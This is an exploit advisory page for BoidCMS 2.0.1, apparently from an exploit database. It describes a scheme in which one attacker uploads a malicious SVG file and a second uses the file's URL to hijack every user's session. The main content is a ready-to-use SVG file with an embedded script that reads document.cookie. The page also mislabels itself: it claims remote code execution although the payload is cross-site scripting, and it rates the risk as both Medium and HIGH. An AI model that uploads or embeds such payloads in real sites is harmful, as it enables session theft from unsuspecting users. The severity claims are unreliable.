BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING

Risk: Medium
Local: Yes
Remote: Yes

## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING ## Author: nu11secur1ty ## Date: 10/13/2023 ## Vendor: ## Software: ## Reference: ## LAB: ## Description: This attack needs two attackers to be complete. The first one has credentials and he will be using them to upload a malicious dirty SVG file, when he is ready he just quits the application and he will send the malicious URL to the second attacker. When the second attacker has this URL he can be using it to access EVERY Session of the EVERY user of this system. This will be stopped when the real admin finds this malicious file, but it will be too late for all users of this system. This attack is called TMITM-Two men in the middle! STATUS: HIGH- Vulnerability [+]Exploit: ```svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""> <svg version="1.1" baseProfile="full" xmlns=""> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> ``` ## Reproduce: [href]( ## Proof and Exploit: [href]( ## Time spent: 01:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at and 0day Exploit DataBase home page: hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top